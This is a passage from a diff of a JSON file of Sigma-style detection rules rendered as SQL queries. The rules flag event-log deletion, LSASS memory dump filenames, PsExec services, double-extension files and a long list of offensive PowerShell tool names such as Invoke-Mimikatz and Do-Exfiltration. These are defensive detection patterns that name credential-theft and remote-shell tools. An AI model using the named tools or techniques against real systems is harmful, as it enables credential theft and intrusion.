'%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "EventLog EVTX File Deleted", + "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_event_log_files.yml" }, { - "title": "Remote Service Activity via SVCCTL Named Pipe", - "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "status": "test", - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "author": "Samir Bousseaden", + "title": "Tomcat WebServer Logs Deleted", + "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "status": "experimental", + "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the tomcat server", + "During log rotation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" ], - "filename": "win_security_svcctl_remote_service.yml" + "filename": "file_delete_win_delete_tomcat_logs.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "status": "experimental", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1137.003" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", - "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "status": "test", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", "attack.t1003.001" @@ -714,3912 +735,3454 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "title": "PsExec Service File Creation", + "id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", + "author": "Thomas Patzke", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_tool_psexec.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "Installation of TeamViewer Desktop", + "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "TeamViewer_Desktop.exe is create during install", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\'" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_install_teamviewer_desktop.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", + "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" + "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" }, { - "title": "Azure AD Health Monitoring Agent Registry Keys Access", - "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' 